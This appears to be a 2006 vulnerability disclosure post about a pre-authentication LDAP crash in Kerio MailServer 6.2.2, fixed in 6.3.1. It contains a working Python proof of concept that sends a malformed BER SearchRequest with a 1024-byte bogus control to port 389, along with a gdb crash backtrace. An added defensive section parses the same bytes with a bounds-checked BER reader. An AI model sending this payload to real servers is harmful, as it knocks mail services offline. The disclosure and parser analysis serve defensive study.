kms1.py.txt

15 Dec 2006, reported by Evgeny Legerov. Source: packetstorm (packetstormsecurity.com)

Kerio MailServer 6.3.1 fixed vd_kms6 vulnerability

Hi,

Kerio MailServer 6.3.1 changelog mentions the following bug fix:
'Fixed possible service stop when handling certain LDAP query'

It turns out that the vd_kms6 vulnerability (which has been part of VulnDisco since Oct
2006) has been fixed.

Below is a simple proof of concept code for this bug:
```python
#!/usr/bin/env python3
# kms1.py - Kerio MailServer 6.2.2 preauth remote DoS
# fixed in Kerio MailServer 6.3.1
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.


"""
gdb backtrace:
# gdb -q ./mailserver core.18450
(no debugging symbols found)
Using host libthread_db library "/lib/libthread_db.so.1".
Reading symbols from shared object read from target memory...(no debugging
symbols found)...done.
Loaded system supplied DSO at 0xb76000
Core was generated by `/opt/kerio/mailserver/mailserver /opt/kerio/mailserver'.
Program terminated with signal 11, Segmentation fault.
...
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()
(gdb) bt
#0 0x0821c444 in LDAPSearchRequest::parsePagedResults ()
#1 0x0821c387 in LDAPSearchRequest::setAll ()
#2 0x08093d8a in Ber::getSearchRequest ()
#3 0x08205e48 in LDAPServer::search ()
#4 0x08207de0 in LDAPServer::server ()
#5 0x08207e2e in ldap_handler ()
#6 0x0841be13 in KServerTask::handler ()
#7 0x082033c6 in KThreadPool::workerThread ()
#8 0x086ee7b6 in kerio::tiny::thread ()
#9 0x00772b80 in start_thread () from /lib/libpthread.so.0
#10 0x00558dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0x821c444 <_ZN17LDAPSearchRequest17parsePagedResultsE13LDAPExtension+12>: mov (%eax),%edx
(gdb) i r eax
eax 0x449 1097
"""

import socket

host = "localhost"
port = 389

# One BER-encoded LDAPMessage carrying a SearchRequest (RFC 4511 layout),
# byte for byte the original payload, split per field for readability.
s = b"\x30\x82\x04\x4d"                 # LDAPMessage SEQUENCE, length 0x44d (1101)
s += b"\x02\x01\x26"                    # messageID INTEGER 38
s += b"\x63\x82\x04\x46"                # [APPLICATION 3] SearchRequest, length 0x446 (1094)
s += b"\x04\x00"                        # baseObject: empty DN
s += b"\x0a\x01\x02"                    # scope: wholeSubtree
s += b"\x0a\x01\x00"                    # derefAliases: neverDerefAliases
s += b"\x02\x01\x00"                    # sizeLimit 0
s += b"\x02\x01\x00"                    # timeLimit 0
s += b"\x01\x01\x00"                    # typesOnly FALSE
s += b"\x87\x0b" + b"objectClass"       # filter: [7] present "objectClass"
s += b"\x30\x02\x04\x00"                # attributes: SEQUENCE { "" }
s += b"\xa0\x82\x04\x20"                # [0] Controls, length 0x420 (1056); note it sits
                                        # inside the SearchRequest's declared length
s += b"\x30\x82\x04\x1c"                # Control SEQUENCE, length 0x41c (1052)
s += b"\x01" * 1024                     # control body: 1024 bytes of 0x01 where the
                                        # controlType OCTET STRING would normally be
s += b"\x16" + b"1.2.840.113556.1.4.473"  # length byte 22 followed by an OID string
s += b"\x01\x01\x00"                    # BOOLEAN FALSE
s += b"\x04\x00"                        # empty OCTET STRING

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
sock.sendall(s)
try:
    # Wait for whatever the server sends back, or for the connection to drop.
    print(sock.recv(10000))
except ConnectionError as err:
    print("connection closed by server:", err)
sock.close()
```
  
Regards,
-Evgeny
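The PoC above only sends the bytes. To see what an LDAP parser has to get right with this input, here is an added example (not code from the original post, and not Kerio's own parser) that walks the same message with a bounds-checked BER reader and then applies the RFC 4511 Control shape check. `poc_message` reproduces the PoC's bytes exactly; the reader assumes single-byte tags and length fields of at most four bytes, which is all this message uses. It surfaces two things the hex alone hides: the `[0] Controls` element is nested inside the SearchRequest's declared length rather than following it in the LDAPMessage, and every declared length is self-consistent, so a parser that only validates lengths walks all the way into the 1052-byte control body, whose first element is a BOOLEAN (tag 0x01) instead of the OCTET STRING controlType the grammar requires.

```python
# Added example, not code from the original post: a bounds-checked BER walk
# over the exact bytes kms1.py sends, plus the RFC 4511 shape check a Control
# must pass. Assumes single-byte tags and at most four length bytes.


def poc_message() -> bytes:
    """The LDAP SearchRequest kms1.py sends, byte for byte (1105 bytes)."""
    head = bytes.fromhex(
        "3082044d 020126 63820446 0400 0a0102 0a0100 020100 020100 010100"
        " 870b 6f626a656374436c617373 30020400 a0820420 3082041c")
    tail = b"\x16" + b"1.2.840.113556.1.4.473" + b"\x01\x01\x00\x04\x00"
    return head + b"\x01" * 1024 + tail


def read_tlv(buf: bytes, pos: int, end: int):
    """Decode one TLV header at buf[pos]; return (tag, value_start, value_end).
    Raises ValueError if the header is truncated or the declared length does
    not fit before `end`, the check to make before trusting any length."""
    if pos + 2 > end:
        raise ValueError(f"truncated TLV header at offset {pos}")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        nbytes = first & 0x7F
        if nbytes == 0 or nbytes > 4 or pos + nbytes > end:
            raise ValueError(f"bad or truncated length field at offset {pos - 1}")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > end:
        raise ValueError(f"length {length} at offset {pos} overruns bound {end}")
    return tag, pos, pos + length


def walk_sequence(buf: bytes, start: int, end: int):
    """Return every (tag, value) pair between start and end, in order."""
    items, pos = [], start
    while pos < end:
        tag, vs, ve = read_tlv(buf, pos, end)
        items.append((tag, buf[vs:ve]))
        pos = ve
    return items


SCOPES = {0: "baseObject", 1: "singleLevel", 2: "wholeSubtree"}


def parse_search_request(msg: bytes) -> dict:
    """Decode an LDAPMessage carrying a SearchRequest and locate its controls."""
    tag, vs, ve = read_tlv(msg, 0, len(msg))
    if tag != 0x30:
        raise ValueError("LDAPMessage must be a SEQUENCE")
    message = walk_sequence(msg, vs, ve)
    (id_tag, id_val), (op_tag, op_val) = message[0], message[1]
    if id_tag != 0x02 or op_tag != 0x63:        # 0x63 = [APPLICATION 3]
        raise ValueError("not a SearchRequest")
    fields = walk_sequence(op_val, 0, len(op_val))
    if len(fields) < 8:
        raise ValueError("SearchRequest is missing fields")
    base, scope, _deref, _size, _time, _types, flt, attrs = fields[:8]
    out = {
        "messageID": int.from_bytes(id_val, "big", signed=True),
        "baseObject": base[1].decode(),
        "scope": SCOPES.get(scope[1][0], scope[1][0]),
        "filter": (flt[0], flt[1].decode()),    # (0x87, "objectClass") = [7] present
        "attributes": [v.decode() for _, v in walk_sequence(attrs[1], 0, len(attrs[1]))],
        "controls": None,
        "controls_location": None,
    }
    # RFC 4511 places controls [0] after protocolOp in the LDAPMessage; the
    # PoC instead nests them inside the SearchRequest's own declared length.
    if len(message) > 2 and message[2][0] == 0xA0:
        out["controls"], out["controls_location"] = message[2][1], "LDAPMessage"
    elif len(fields) > 8 and fields[8][0] == 0xA0:
        out["controls"], out["controls_location"] = fields[8][1], "inside SearchRequest"
    return out


# Control ::= SEQUENCE { controlType OCTET STRING, criticality BOOLEAN OPTIONAL,
#                        controlValue OCTET STRING OPTIONAL } -> legal tag shapes:
ALLOWED_CONTROL_SHAPES = {(0x04,), (0x04, 0x01), (0x04, 0x04), (0x04, 0x01, 0x04)}


def check_control(controls: bytes) -> dict:
    """Shape-check the first Control in a Controls value.  Every length in the
    PoC's control is self-consistent, so only this tag check turns it away."""
    items = walk_sequence(controls, 0, len(controls))
    if not items or items[0][0] != 0x30:
        return {"ok": False, "reason": "Controls must hold Control SEQUENCEs", "elements": []}
    elems = walk_sequence(items[0][1], 0, len(items[0][1]))
    tags = tuple(t for t, _ in elems)
    if tags in ALLOWED_CONTROL_SHAPES:
        return {"ok": True, "reason": "", "elements": elems}
    reason = (f"{len(elems)} elements, first tags "
              + ", ".join("0x%02x" % t for t in tags[:3])
              + "; expected an OCTET STRING controlType first")
    return {"ok": False, "reason": reason, "elements": elems}
```

Calling `check_control(parse_search_request(poc_message())["controls"])` returns `ok == False` with 344 elements in the control body: 341 one-byte BOOLEANs, the OID string 1.2.840.113556.1.4.473 carried under a BOOLEAN tag, a BOOLEAN FALSE and an empty OCTET STRING. A conformant decoder therefore rejects the control before dispatching on its OID, and a message cut one byte short (`poc_message()[:-1]`) is refused at the outer header by `read_tlv` before any body is read. The gdb output in the PoC shows the crash dereferencing eax = 0x449 (1097) as a pointer inside parsePagedResults; the walker does not explain how that value arises, only that length-only validation is not enough to keep this input out of that code path.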
